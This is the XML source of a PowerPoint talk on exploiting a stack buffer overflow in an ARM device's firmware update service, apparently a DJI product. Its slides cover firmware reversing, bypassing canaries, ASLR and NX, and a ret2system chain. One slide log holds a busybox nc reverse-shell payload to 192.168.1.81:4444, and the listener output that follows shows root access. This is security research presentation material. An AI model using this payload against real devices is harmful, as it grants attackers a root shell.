            <a:ext cx="8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X-8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1344" y="6114619"/>
            <a:ext cx="23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Buffer = X-0x808</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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423592" y="6290361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9376" y="6483951"/>
            <a:ext cx="214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SP = X – 0x904</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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51298" y="4980824"/>
            <a:ext cx="6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X</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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8911" y="5839913"/>
            <a:ext cx="2240246" cy="4504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498911" y="5165490"/>
            <a:ext cx="2240247" cy="328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0xb6f0f1a0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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98911" y="4799395"/>
            <a:ext cx="224024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0xb8c84fd0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1746" y="4447778"/>
            <a:ext cx="2237412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0xb5a7ccf4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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5732760" y="5655246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251298" y="5496930"/>
            <a:ext cx="11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j-lt"/>
              </a:rPr>
              <a:t>Canary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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023549" y="47961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R4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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020636" y="4426961"/>
            <a:ext cx="4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R5</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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9530" y="4052012"/>
            <a:ext cx="2239628" cy="3960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+mj-lt"/>
              </a:rPr>
              <a:t>Garbage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj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34902" y="4069523"/>
            <a:ext cx="4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R6</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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98911" y="3691331"/>
            <a:ext cx="2240247" cy="353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R11 – 0xda9</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty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98911" y="3335286"/>
            <a:ext cx="224024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0xb8c852cc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-l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032043" y="3695156"/>
            <a:ext cx="4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R7</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-l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23549" y="3328862"/>
            <a:ext cx="4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R8</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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98911" y="2978763"/>
            <a:ext cx="224024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0xb6f0db42</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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98911" y="2622528"/>
            <a:ext cx="224024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0xb6e6757d</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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023549" y="2978841"/>
            <a:ext cx="4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R9</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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953067" y="2583405"/>
            <a:ext cx="5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R10</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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98911" y="1924042"/>
            <a:ext cx="2240247" cy="353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LR – 0x3B74</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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98911" y="2274438"/>
            <a:ext cx="2240247" cy="353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0xb5a7cdd0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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946453" y="2256626"/>
            <a:ext cx="5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R11</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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953067" y="1926629"/>
            <a:ext cx="54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PC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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02258" y="1534191"/>
            <a:ext cx="2236899" cy="3826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command</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65" name="Connecteur en angle 64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="47" idx="3"/>
            <a:endCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5739157" y="1725512"/>
            <a:ext cx="1" cy="2142656"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -228600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5739158" y="2060848"/>
            <a:ext cx="1069340" cy="78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2"/>
          <a:srcRect r="6254" b="811"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809987" y="1294182"/>
            <a:ext cx="5334686" cy="2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2 : ret2system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9376" y="1844824"/>
            <a:ext cx="11521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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>E/assistant update(  158): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> id 0x0,len 1 ,md5 ________________________________________î®]z____</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ðO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>╚©¶╠ºÁCCÒ'└ºÁ╠R╚©B█­Â}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uµÂð</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>═ºÁ╔5­Â                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mknod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tmp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backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> p &amp;&amp; /system/bin/sh 0&lt;/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tmp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backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>busybox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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.1.81 4444 1&gt;/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tmp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backpipe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E/assistant update(  158): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>somethind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wrong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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> !!</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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376" y="4264789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C:\Users\warha\Downloads&gt;nc64.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> on [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>] 4444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>...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2 : ret2system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9376" y="1844824"/>
            <a:ext cx="11521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ØÈõa&amp;îÇ4§╚VN\gªØÈõa&amp;îÇ4§╚VN\gª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dji_version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hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0, 0 0</a:t>
            </a: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getFirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> id 0x0,len 1 ,md5 ________________________________________î®]z____</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ðO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>╚©¶╠ºÁCCÒ'└ºÁ╠R╚©B█­Â}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uµÂð</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>═ºÁ╔5­Â                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mknod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /data/local/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> p &amp;&amp; /system/bin/sh 0&lt;/data/local/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>backpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>busybox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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.1.81 4444 1&gt;/data/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>backpipe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E/assistant update(  158): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>somethind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wrong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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> !!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4264789"/>
            <a:ext cx="11521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C:\Users\warha\Downloads&gt;nc64.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> on [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>] 4444 ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lookup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failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> for android-b8e8ef430877f601: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>h_errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 11001: HOST_NOT_FOUND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to [192.168.1.81] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> android-b8e8ef430877f601 [192.168.1.22] 39354: HOST_NOT_FOUND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=0(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=0(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/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228850"/>
            <a:ext cx="26193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Funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> part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0" y="2132856"/>
            <a:ext cx="1192097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Funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> part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1844824"/>
            <a:ext cx="9383434" cy="4534533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4655840" y="5157192"/>
            <a:ext cx="576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799856" y="6021288"/>
            <a:ext cx="576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55840" y="3717032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Update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1607179" y="1772816"/>
            <a:ext cx="8977642" cy="4876291"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11012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Funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> part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17" y="1844824"/>
            <a:ext cx="5849166" cy="8859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284984"/>
            <a:ext cx="8183117" cy="310558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5303912" y="450912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303912" y="2276872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Funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> part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2" y="2049491"/>
            <a:ext cx="1169833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Funny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> part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5866" b="62704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="297827" y="3861048"/>
            <a:ext cx="11596345" cy="22283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2" y="2049491"/>
            <a:ext cx="11698333" cy="13622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228850"/>
            <a:ext cx="26193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5866" b="62704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="297827" y="3861048"/>
            <a:ext cx="11596345" cy="22283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32" y="2049491"/>
            <a:ext cx="11698333" cy="13622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01" y="1518971"/>
            <a:ext cx="5715798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0"/>
            <a:ext cx="990134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440" y="5373216"/>
            <a:ext cx="3312368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71" y="1"/>
            <a:ext cx="8511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71" y="1"/>
            <a:ext cx="851180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833562"/>
            <a:ext cx="5410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289596"/>
            <a:ext cx="7573432" cy="5363323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titr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11560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>unpacking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2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ie informatiqu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8_TF02901026_TF02901026.potx" id="{5B96A3B2-8F6C-4C57-AD71-65ECFD3B95A9}" vid="{BBAB43E6-1C62-4FD6-865E-EDACF7274DEC}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2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technologique circuit imprimé pour professionnels (grand écran)</Template>
  <TotalTime>0</TotalTime>
  <Words>2043</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>524</Paragraphs>
  <Slides>54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Candara</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Technologie informatique 16:9</vt:lpstr>
      <vt:lpstr>Real buffer overflow on arm architecture</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Debugging</vt:lpstr>
      <vt:lpstr>Update</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Firmware unpacking</vt:lpstr>
      <vt:lpstr>Firmware content</vt:lpstr>
      <vt:lpstr>Firmware content (2)</vt:lpstr>
      <vt:lpstr>Extracting application</vt:lpstr>
      <vt:lpstr>Extracting application</vt:lpstr>
      <vt:lpstr>ART in a nutshell</vt:lpstr>
      <vt:lpstr>Decompile</vt:lpstr>
      <vt:lpstr>Reverse</vt:lpstr>
      <vt:lpstr>Reverse (2)</vt:lpstr>
      <vt:lpstr>In-Memory Layout of a Program</vt:lpstr>
      <vt:lpstr>ARM assembly</vt:lpstr>
      <vt:lpstr>Leaf and non-leaf functions</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Canary</vt:lpstr>
      <vt:lpstr>ASLR (Address Space Randomization Layout)</vt:lpstr>
      <vt:lpstr>ASLR (Address Space Randomization Layout)</vt:lpstr>
      <vt:lpstr>NX (No eXecute)</vt:lpstr>
      <vt:lpstr>Informations leak</vt:lpstr>
      <vt:lpstr>Firmware structure</vt:lpstr>
      <vt:lpstr>Exploit time</vt:lpstr>
      <vt:lpstr>Stack frame</vt:lpstr>
      <vt:lpstr>Stack frame</vt:lpstr>
      <vt:lpstr>Stack frame</vt:lpstr>
      <vt:lpstr>Stage 1</vt:lpstr>
      <vt:lpstr>Stage 1</vt:lpstr>
      <vt:lpstr>Stage 1</vt:lpstr>
      <vt:lpstr>Stage 1</vt:lpstr>
      <vt:lpstr>Stage 1</vt:lpstr>
      <vt:lpstr>Stage 1.5</vt:lpstr>
      <vt:lpstr>Stage 1.5</vt:lpstr>
      <vt:lpstr>Stage 2 : ret2system</vt:lpstr>
      <vt:lpstr>Stage 2 : ret2system</vt:lpstr>
      <vt:lpstr>Stage 2 : ret2system</vt:lpstr>
      <vt:lpstr>Stage 2 : ret2system</vt:lpstr>
      <vt:lpstr>Funny part</vt:lpstr>
      <vt:lpstr>Funny part</vt:lpstr>
      <vt:lpstr>Funny part</vt:lpstr>
      <vt:lpstr>Funny part</vt:lpstr>
      <vt:lpstr>Funny part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2018-05-09T16:18:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-18T19:27:24Z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